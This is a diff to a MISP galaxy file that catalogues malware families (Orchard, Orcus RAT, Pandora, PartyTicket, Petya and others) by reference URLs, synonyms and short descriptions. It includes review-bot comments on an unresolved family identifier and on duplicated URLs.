- "http://pwc.blogs.com/cyber_security_updates/2014/10/orcarat-a-whale-of-a-tale.html"
+ "http://pwc.blogs.com/cyber_security_updates/2014/10/orcarat-a-whale-of-a-tale.html",
+ "https://www.secureworks.com/research/threat-profiles/bronze-fleetwood"
 ],
 "synonyms": [],
 "type": []
@@ -36641,16 +38356,18 @@
 "value": "OrcaRAT"
 },
 {
- "description": "A malware generating DGA domains seeded by the Bitcoin Genesis Block.",
+ "description": "A malware generating DGA domains seeded by the Bitcoin Genesis Block. This family has strong code overlap with win.victorygate.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.orchard",
- "https://bin.re/blog/a-dga-seeded-by-the-bitcoin-genesis-block/",
+ "https://blog.netlab.360.com/orchard-dga/",
 "https://malverse.it/stack-string-decryptor-con-ghidra-emulator-orchard",
 "https://blog.netlab.360.com/a-new-botnet-orchard-generates-dga-domains-with-bitcoin-transaction-information/",
- "https://blog.netlab.360.com/orchard-dga/"
+ "https://bin.re/blog/a-dga-seeded-by-the-bitcoin-genesis-block/"
+ ],
+ "synonyms": [
+ "Antavmu"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "094159e7-cc4f-4c47-b24e-b0a32ba23a58",
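Review bot: The sentence added to the Orchard description refers to `win.victorygate`, a Malpedia-internal family identifier, while every other entry in this cluster names families by their display name, so a reader of the galaxy cannot resolve the reference without going back to Malpedia. If the generator can map that identifier to this cluster's own VictoryGate entry (assuming one exists), the overlap belongs in a `related` entry carrying that entry's `dest-uuid`, which MISP can follow; failing that, the sentence should at least carry the display name, e.g. `This family has strong code overlap with VictoryGate (win.victorygate).`. The `Antavmu` synonym and the reordered refs need no change.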
@@ -36661,19 +38378,19 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.orcus_rat",
- "https://blog.fortinet.com/2017/12/07/a-peculiar-case-of-orcus-rat-targeting-bitcoin-investors",
- "http://researchcenter.paloaltonetworks.com/2016/08/unit42-orcus-birth-of-an-unusual-plugin-builder-rat/",
 "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
- "https://krebsonsecurity.com/2019/04/canadian-police-raid-orcus-rat-author/",
- "https://www.canada.ca/en/radio-television-telecommunications/news/2019/03/crtc-and-rcmp-national-division-execute-warrants-in-malware-investigation.html",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://blog.talosintelligence.com/2019/08/rat-ratatouille-revrat-orcus.html",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks",
- "https://asec.ahnlab.com/en/45462/",
- "https://krebsonsecurity.com/2016/07/canadian-man-is-author-of-popular-orcus-rat/",
- "https://any.run/cybersecurity-blog/orcus-rat-malware-analysis/",
 "https://assets.virustotal.com/reports/2021trends.pdf",
- "https://blog.checkpoint.com/2019/02/27/protecting-against-winrar-vulnerabilities/"
+ "https://any.run/cybersecurity-blog/orcus-rat-malware-analysis/",
+ "https://blog.talosintelligence.com/2019/08/rat-ratatouille-revrat-orcus.html",
+ "https://www.canada.ca/en/radio-television-telecommunications/news/2019/03/crtc-and-rcmp-national-division-execute-warrants-in-malware-investigation.html",
+ "https://blog.fortinet.com/2017/12/07/a-peculiar-case-of-orcus-rat-targeting-bitcoin-investors",
+ "https://krebsonsecurity.com/2019/04/canadian-police-raid-orcus-rat-author/",
+ "https://asec.ahnlab.com/en/45462/",
+ "https://blog.checkpoint.com/2019/02/27/protecting-against-winrar-vulnerabilities/",
+ "http://researchcenter.paloaltonetworks.com/2016/08/unit42-orcus-birth-of-an-unusual-plugin-builder-rat/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks",
+ "https://krebsonsecurity.com/2016/07/canadian-man-is-author-of-popular-orcus-rat/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf"
 ],
 "synonyms": [
 "Schnorchel"
@@ -36688,12 +38405,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ordinypt",
- "https://www.carbonblack.com/2019/09/05/cb-threat-analysis-unit-technical-breakdown-germanwiper-ransomware/",
 "https://dissectingmalwa.re/tfw-ransomware-is-only-your-side-hustle.html",
- "https://www.bleepingcomputer.com/news/security/ordinypt-ransomware-intentionally-destroys-files-currently-targeting-germany/",
- "https://www.gdata.de/blog/2017/11/30151-ordinypt",
+ "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
 "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
- "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat"
+ "https://www.gdata.de/blog/2017/11/30151-ordinypt",
+ "https://www.carbonblack.com/2019/09/05/cb-threat-analysis-unit-technical-breakdown-germanwiper-ransomware/",
+ "https://www.bleepingcomputer.com/news/security/ordinypt-ransomware-intentionally-destroys-files-currently-targeting-germany/"
 ],
 "synonyms": [
 "GermanWiper",
@@ -36722,16 +38439,16 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.oski",
- "https://cyberint.com/blog/research/mars-stealer/",
 "https://blog.minerva-labs.com/underminer-exploit-kit-the-more-you-check-the-more-evasive-you-become",
+ "https://isc.sans.edu/diary/Arkei+Variants%3A+From+Vidar+to+Mars+Stealer/28468",
+ "https://www.cyberark.com/resources/threat-research-blog/meet-oski-stealer-an-in-depth-analysis-of-the-popular-credential-stealer",
 "https://yoroi.company/research/the-wayback-campaign-a-large-scale-operation-hiding-in-plain-sight/",
- "https://medium.com/shallvhack/oski-stealer-a-credential-theft-malware-b9bba5164601",
+ "https://twitter.com/albertzsigovits/status/1160874557454131200",
 "https://3xp0rt.com/posts/mars-stealer",
 "https://labs.bitdefender.com/2020/03/new-router-dns-hijacking-attacks-abuse-bitbucket-to-host-infostealer/",
- "https://drive.google.com/file/d/1c72YIF6JYcEvbFZCrkZO26D9hC3gnyMP/view",
- "https://twitter.com/albertzsigovits/status/1160874557454131200",
- "https://www.cyberark.com/resources/threat-research-blog/meet-oski-stealer-an-in-depth-analysis-of-the-popular-credential-stealer",
- "https://isc.sans.edu/diary/Arkei+Variants%3A+From+Vidar+to+Mars+Stealer/28468"
+ "https://medium.com/shallvhack/oski-stealer-a-credential-theft-malware-b9bba5164601",
+ "https://cyberint.com/blog/research/mars-stealer/",
+ "https://drive.google.com/file/d/1c72YIF6JYcEvbFZCrkZO26D9hC3gnyMP/view"
 ],
 "synonyms": [],
 "type": []
@@ -36744,8 +38461,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.osno",
- "https://www.gdatasoftware.com/blog/2020/11/36459-babax-stealer-rebrands-to-osno-installs-rootkit",
- "https://labs.k7computing.com/?p=21562"
+ "https://labs.k7computing.com/?p=21562",
+ "https://www.gdatasoftware.com/blog/2020/11/36459-babax-stealer-rebrands-to-osno-installs-rootkit"
 ],
 "synonyms": [
 "Babax"
@@ -36760,8 +38477,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ousaban",
- "https://www.netskope.com/blog/ousaban-latam-banking-malware-abusing-cloud-services",
 "https://www.welivesecurity.com/2021/05/05/ousaban-private-photo-collection-hidden-cabinet/",
+ "https://www.netskope.com/blog/ousaban-latam-banking-malware-abusing-cloud-services",
 "https://www.atomicmatryoshka.com/post/ousaban-msi-installer-analysis"
 ],
 "synonyms": [],
@@ -36788,9 +38505,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.outlook_backdoor",
+ "https://twitter.com/VK_Intel/status/1085820673811992576",
 "https://www.welivesecurity.com/wp-content/uploads/2018/08/Eset-Turla-Outlook-Backdoor.pdf",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://twitter.com/VK_Intel/status/1085820673811992576"
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf"
 ],
 "synonyms": [
 "FACADE"
@@ -36801,7 +38518,7 @@
 "value": "Outlook Backdoor"
 },
 {
- "description": "",
+ "description": "According to MITRE, OutSteel is a file uploader and document stealer developed with the scripting language AutoIT that has been used by Ember Bear since at least March 2021.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.outsteel",
@@ -36818,8 +38535,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.overlay_rat",
- "https://www.cybereason.com/blog/brazilian-financial-malware-dll-hijacking",
- "https://securityintelligence.com/overlay-rat-malware-uses-autoit-scripting-to-bypass-antivirus-detection/"
+ "https://securityintelligence.com/overlay-rat-malware-uses-autoit-scripting-to-bypass-antivirus-detection/",
+ "https://www.cybereason.com/blog/brazilian-financial-malware-dll-hijacking"
 ],
 "synonyms": [],
 "type": []
@@ -36845,8 +38562,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.owaauth",
- "https://www.secureworks.com/research/threat-profiles/bronze-union",
- "https://threatpost.com/targeted-attack-exposes-owa-weakness/114925/"
+ "https://threatpost.com/targeted-attack-exposes-owa-weakness/114925/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-union"
 ],
 "synonyms": [
 "luckyowa"
@@ -36862,8 +38579,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.owlproxy",
 "https://lab52.io/blog/chimera-apt-updates-on-its-owlproxy-malware/",
- "https://www.welivesecurity.com/wp-content/uploads/2021/06/eset_gelsemium.pdf",
 "https://securelist.com/the-sessionmanager-iis-backdoor/106868/",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/06/eset_gelsemium.pdf",
 "https://medium.com/cycraft/taiwan-government-targeted-by-multiple-cyberattacks-in-april-2020-3b20cea1dc20"
 ],
 "synonyms": [],
@@ -36958,24 +38675,24 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.pandabanker",
- "http://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html",
- "https://www.vkremez.com/2018/08/lets-learn-dissecting-panda-banker.html",
- "https://cyber.wtf/2017/03/13/zeus-panda-webinjects-dont-trust-your-eyes/",
- "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta544-targets-geographies-italy-japan-range-malware",
- "https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf",
- "https://www.arbornetworks.com/blog/asert/panda-banker-zeros-in-on-japanese-targets/",
 "https://cyber.wtf/2017/02/03/zeus-panda-webinjects-a-case-study/",
+ "https://www.proofpoint.com/us/threat-insight/post/zeus-panda-banking-trojan-targets-online-holiday-shoppers",
+ "http://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html",
+ "https://github.com/JR0driguezB/malware_configs/tree/master/PandaBanker",
+ "https://www.arbornetworks.com/blog/asert/panda-banker-zeros-in-on-japanese-targets/",
+ "https://www.vkremez.com/2018/08/lets-learn-dissecting-panda-banker.html",
+ "https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf",
+ "https://cyber.wtf/2017/03/13/zeus-panda-webinjects-dont-trust-your-eyes/",
+ "https://medium.com/@crovax/panda-banker-analysis-part-1-d08b3a855847",
+ "http://www.vkremez.com/2018/01/lets-learn-dissect-panda-banking.html",
+ "https://f5.com/labs/articles/threat-intelligence/malware/panda-malware-broadens-targets-to-cryptocurrency-exchanges-and-social-media",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
 "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much",
+ "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta544-targets-geographies-italy-japan-range-malware",
"https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
 "https://www.youtube.com/watch?v=J7VOfAJvxEY",
 "https://www.spamhaus.org/news/article/771/",
- "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
- "https://www.proofpoint.com/us/threat-insight/post/zeus-panda-banking-trojan-targets-online-holiday-shoppers",
- "https://github.com/JR0driguezB/malware_configs/tree/master/PandaBanker",
- "https://medium.com/@crovax/panda-banker-analysis-part-1-d08b3a855847",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "http://www.vkremez.com/2018/01/lets-learn-dissect-panda-banking.html",
- "https://f5.com/labs/articles/threat-intelligence/malware/panda-malware-broadens-targets-to-cryptocurrency-exchanges-and-social-media"
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf"
 ],
 "synonyms": [
 "ZeusPanda"
@@ -36990,8 +38707,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.panda_stealer",
- "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/",
- "https://www.trendmicro.com/en_us/research/21/e/new-panda-stealer-targets-cryptocurrency-wallets-.html"
+ "https://www.trendmicro.com/en_us/research/21/e/new-panda-stealer-targets-cryptocurrency-wallets-.html",
+ "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/"
 ],
 "synonyms": [],
 "type": []
@@ -37004,12 +38721,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.pandora",
- "https://www.fortinet.com/blog/threat-research/Using-emulation-against-anti-reverse-engineering-techniques",
- "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader",
 "https://kienmanowar.wordpress.com/2022/03/21/quicknote-analysis-of-pandora-ransomware/",
- "https://blog.cyble.com/2022/03/15/deep-dive-analysis-pandora-ransomware/",
 "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
 "https://www.fortinet.com/blog/threat-research/looking-inside-pandoras-box",
+ "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader",
+ "https://www.fortinet.com/blog/threat-research/Using-emulation-against-anti-reverse-engineering-techniques",
+ "https://blog.cyble.com/2022/03/15/deep-dive-analysis-pandora-ransomware/",
 "https://cloudsek.com/technical-analysis-of-emerging-sophisticated-pandora-ransomware-group/",
 "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
 "https://dissectingmalwa.re/blog/pandora/"
@@ -37026,8 +38743,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.pandora_rat",
 "https://github.com/AZMagic/Pandora-Hvnc-Hidden-Browser-Real-Vnc-Working-Chromium-Edge-Opera-Gx",
- "https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware",
- "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya"
+ "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
+ "https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware"
 ],
 "synonyms": [
 "Pandora hVNC RAT"
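Review bot: The Pandora `refs` array on the new side still lists the Microsoft ransomware-as-a-service post twice, once as `...-how-to-protect-yourself/` and once as `...-how-to-protect-yourself` with no trailing slash, and the reorder in this hunk keeps both; the PartyTicket hunk further down has the same problem, where `https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine` and the Trustwave `overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war` URL each end up present with and without a trailing slash. Consumers that key on the URL string will treat these as distinct references, so I would keep one form per source and drop the slash-less variant in each entry. The reference lists in these hunks also look reshuffled rather than sorted; if this cluster is regenerated from an upstream feed, normalising trailing slashes and sorting `refs` before emitting would both remove the duplicates and keep future diffs small.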
@@ -37042,8 +38759,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.paradies_clipper",
- "https://www.youtube.com/watch?v=wjoH9jW2EPQ",
- "https://perception-point.io/blog/behind-the-attack-paradies-clipper-malware/"
+ "https://perception-point.io/blog/behind-the-attack-paradies-clipper-malware/",
+ "https://www.youtube.com/watch?v=wjoH9jW2EPQ"
 ],
 "synonyms": [],
 "type": []
@@ -37056,14 +38773,15 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.paradise",
- "https://marcoramilli.com/2021/08/23/paradise-ransomware-the-builder/",
+ "https://therecord.media/source-code-for-paradise-ransomware-leaked-on-hacking-forums/",
 "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/",
- "https://asec.ahnlab.com/en/47590/",
 "https://www.lastline.com/labsblog/iqy-files-and-paradise-ransomware/",
 "https://www.trendmicro.com/en_us/research/23/d/rapture-a-ransomware-family-with-similarities-to-paradise.html",
- "https://therecord.media/source-code-for-paradise-ransomware-leaked-on-hacking-forums/",
+ "https://www.acronis.com/en-us/blog/posts/paradise-ransomware-strikes-again",
+ "https://marcoramilli.com/2021/08/23/paradise-ransomware-the-builder/",
+ "https://mssplab.github.io/threat-hunting/2023/06/23/src-paradise.html",
 "https://labs.bitdefender.com/2020/01/paradise-ransomware-decryption-tool",
- "https://www.acronis.com/en-us/blog/posts/paradise-ransomware-strikes-again"
+ "https://asec.ahnlab.com/en/47590/"
 ],
 "synonyms": [],
 "type": []
@@ -37076,14 +38794,14 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.parallax",
- "https://twitter.com/malwrhunterteam/status/1227196799997431809",
- "https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html",
 "https://blog.morphisec.com/parallax-rat-active-status",
- "https://www.bleepingcomputer.com/news/security/unskilled-hacker-linked-to-years-of-attacks-on-aviation-transport-sectors/",
- "https://threatpost.com/ta2541-apt-rats-aviation/178422/",
+ "https://www.bleepingcomputer.com/news/security/parallax-rat-common-malware-payload-after-hacker-forums-promotion/",
 "https://www.vkremez.com/2020/02/lets-learn-inside-parallax-rat-malware.html",
 "https://www.uptycs.com/blog/cryptocurrency-entities-at-risk-threat-actor-uses-parallax-rat-for-infiltration",
- "https://www.bleepingcomputer.com/news/security/parallax-rat-common-malware-payload-after-hacker-forums-promotion/"
+ "https://twitter.com/malwrhunterteam/status/1227196799997431809",
+ "https://threatpost.com/ta2541-apt-rats-aviation/178422/",
+ "https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html",
+ "https://www.bleepingcomputer.com/news/security/unskilled-hacker-linked-to-years-of-attacks-on-aviation-transport-sectors/"
 ],
 "synonyms": [
 "ParallaxRAT"
@@ -37111,34 +38829,34 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.partyticket",
- "https://securelist.com/elections-goransom-and-hermeticwiper-attack/105960/",
- "https://www.zscaler.com/blogs/security-research/technical-analysis-partyticket-ransomware",
- "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/",
- "https://www.youtube.com/watch?v=mrTdSdMMgnk",
- "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine",
- "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
- "https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/",
- "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-hermeticwiper-partyticket",
+ "https://www.bleepingcomputer.com/news/security/free-decryptor-released-for-hermeticransom-victims-in-ukraine/",
 "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/",
- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd",
+ "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
+ "https://securelist.com/new-ransomware-trends-in-2022/106457/",
+ "https://www.splunk.com/en_us/blog/security/detecting-hermeticwiper.html",
+ "https://securelist.com/elections-goransom-and-hermeticwiper-attack/105960/",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
+ "https://www.mandiant.com/resources/information-operations-surrounding-ukraine",
+ "https://threatpost.com/free-hermeticransom-ransomware-decryptor-released/178762/",
+ "https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/",
+ "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/",
+ "https://go.recordedfuture.com/hubfs/reports/mtp-2022-0302.pdf",
+ "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf",
+ "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-hermeticwiper-partyticket",
+ "https://www.kaspersky.com/blog/hermeticransom-hermeticwiper-attacks-2022/43825/",
 "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
 "https://www.crowdstrike.com/blog/how-to-decrypt-the-partyticket-ransomware-targeting-ukraine/",
- "https://securelist.com/new-ransomware-trends-in-2022/106457/",
- "https://decoded.avast.io/threatresearch/help-for-ukraine-free-decryptor-for-hermeticransom-ransomware/",
- "https://www.brighttalk.com/webcast/15591/534324",
- "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf",
- "https://go.recordedfuture.com/hubfs/reports/mtp-2022-0302.pdf",
- "https://www.splunk.com/en_us/blog/security/detecting-hermeticwiper.html",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
- "https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf",
- "https://www.kaspersky.com/blog/hermeticransom-hermeticwiper-attacks-2022/43825/",
 "https://www.mandiant.com/resources/russia-invasion-ukraine-retaliation",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
- "https://www.mandiant.com/resources/information-operations-surrounding-ukraine",
- "https://www.bleepingcomputer.com/news/security/free-decryptor-released-for-hermeticransom-victims-in-ukraine/",
- "https://threatpost.com/free-hermeticransom-ransomware-decryptor-released/178762/",
 "https://www.techtarget.com/searchsecurity/news/252514091/CrowdStrike-cracks-PartyTicket-ransomware-targeting-Ukraine",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf"
+ "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd",
+ "https://decoded.avast.io/threatresearch/help-for-ukraine-free-decryptor-for-hermeticransom-ransomware/",
+ "https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
+ "https://www.brighttalk.com/webcast/15591/534324",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf",
+ "https://www.zscaler.com/blogs/security-research/technical-analysis-partyticket-ransomware",
+ "https://www.youtube.com/watch?v=mrTdSdMMgnk"
 ],
 "synonyms": [
 "Elections GoRansom",
@@ -37168,13 +38886,13 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.pay2key",
- "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
 "https://research.checkpoint.com/2020/ransomware-alert-pay2key/",
- "https://twitter.com/TrendMicroRSRCH/status/1389422784808378370",
- "https://www.bleepingcomputer.com/news/security/intels-habana-labs-hacked-by-pay2key-ransomware-data-stolen/",
+ "https://www.clearskysec.com/wp-content/uploads/2020/12/Pay2Kitten.pdf",
 "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://www.clearskysec.com/wp-content/uploads/2020/12/Pay2Kitten.pdf"
+ "https://www.bleepingcomputer.com/news/security/intels-habana-labs-hacked-by-pay2key-ransomware-data-stolen/",
+ "https://twitter.com/TrendMicroRSRCH/status/1389422784808378370",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3"
 ],
 "synonyms": [
 "Cobalt"
@@ -37202,8 +38920,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.pcshare",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf",
- "https://web.archive.org/web/20191115210757/https://threatvector.cylance.com/en_us/home/pcshare-backdoor-attacks-targeting-windows-users-with-fakenarrator-malware.html"
+ "https://web.archive.org/web/20191115210757/https://threatvector.cylance.com/en_us/home/pcshare-backdoor-attacks-targeting-windows-users-with-fakenarrator-malware.html",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -37216,14 +38934,14 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.pebbledash",
+ "https://malwarenailed.blogspot.com/2020/06/peebledash-lazarus-hiddencobra-rat.html?m=1",
+ "https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/",
+ "https://asec.ahnlab.com/en/30022/",
 "https://www.us-cert.gov/ncas/analysis-reports/ar20-133c",
 "https://blog.reversinglabs.com/blog/hidden-cobra",
- "https://asec.ahnlab.com/en/30022/",
- "https://download.ahnlab.com/global/brochure/Analysis%20Report%20of%20Kimsuky%20Group.pdf",
- "https://asec.ahnlab.com/wp-content/uploads/2021/11/Kimsuky-%EA%B7%B8%EB%A3%B9%EC%9D%98-APT-%EA%B3%B5%EA%B2%A9-%EB%B6%84%EC%84%9D-%EB%B3%B4%EA%B3%A0%EC%84%9C-AppleSeed-PebbleDash.pdf",
 "https://asec.ahnlab.com/en/30532/",
- "https://malwarenailed.blogspot.com/2020/06/peebledash-lazarus-hiddencobra-rat.html?m=1",
- "https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/"
+ "https://asec.ahnlab.com/wp-content/uploads/2021/11/Kimsuky-%EA%B7%B8%EB%A3%B9%EC%9D%98-APT-%EA%B3%B5%EA%B2%A9-%EB%B6%84%EC%84%9D-%EB%B3%B4%EA%B3%A0%EC%84%9C-AppleSeed-PebbleDash.pdf",
+ "https://download.ahnlab.com/global/brochure/Analysis%20Report%20of%20Kimsuky%20Group.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -37236,10 +38954,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.peddlecheap",
- "https://obscuritylabs.com/blog/2017/11/13/match-made-in-the-shadows-part-3/",
- "https://twitter.com/ESETresearch/status/1258353960781598721",
 "https://www.forcepoint.com/fr/blog/security-labs/new-whitepaper-danderspritzpeddlecheap-traffic-analysis-part-1-2#",
- "https://research.checkpoint.com/2021/a-deep-dive-into-doublefeature-equation-groups-post-exploitation-dashboard/"
+ "https://research.checkpoint.com/2021/a-deep-dive-into-doublefeature-equation-groups-post-exploitation-dashboard/",
+ "https://twitter.com/ESETresearch/status/1258353960781598721",
+ "https://obscuritylabs.com/blog/2017/11/13/match-made-in-the-shadows-part-3/"
 ],
 "synonyms": [],
 "type": []
@@ -37299,7 +39017,7 @@
 "value": "Peppy RAT"
 },
 {
- "description": "",
+ "description": "The PetrWrap Trojan is written in C and compiled in MS Visual Studio. It carries a sample of the Petya ransomware v3 inside its data section and uses Petya to infect the victim\u2019s machine. What\u2019s more, PetrWrap implements its own cryptographic routines and modifies the code of Petya in runtime to control its execution. This allows the criminals behind PetrWrap to hide the fact that they are using Petya during infection.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.petrwrap",
@@ -37317,15 +39035,16 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.petya",
- "https://blog.malwarebytes.com/threat-analysis/2016/04/petya-ransomware/",
- "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/",
- "https://blog.malwarebytes.com/threat-analysis/2016/05/petya-and-mischa-ransomware-duet-p1/",
- "https://blog.malwarebytes.com/threat-analysis/2016/07/third-time-unlucky-improved-petya-is-out/",
 "https://www.microsoft.com/security/blog/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/",
- "https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html",
- "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/",
